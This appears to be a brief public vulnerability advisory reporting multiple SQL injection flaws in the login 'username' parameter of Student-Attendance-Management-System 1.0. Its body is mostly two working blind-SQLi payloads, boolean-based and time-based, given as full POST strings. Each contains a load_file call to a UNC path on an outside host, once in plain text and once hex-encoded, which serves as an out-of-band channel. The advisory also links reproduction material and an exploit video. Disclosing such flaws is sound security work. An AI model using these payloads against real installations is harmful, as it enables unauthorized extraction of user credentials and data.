## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi
## Author: nu11secur1ty
## Date: 12.25.2022
## Vendor: https://github.com/rickxy
## Software: https://github.com/rickxy/Student-Attendance-Management-System
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System

## Description:
The `username` parameter appears to be vulnerable to Multiple-SQL
injection attacks.
The attacker can retrieve all sensitive information about the users of
this system and more bad things.

## STATUS: CRITICAL Vulnerability

[+] Payload:

```MySQL
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
    Payload: userType=Administrator&username=lBPxXeUT'+(select
load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''
RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(select
load_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''
ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: userType=Administrator&username=lBPxXeUT'+(select
load_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''
AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND
'XFcq'='XFcq&password=q2H!z4n!F1&login=Login
---
```

## Reproduce:
[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System

## Proof and Exploit:
[href](https://streamable.com/goy6ka)

## Time spent
`00:30:00`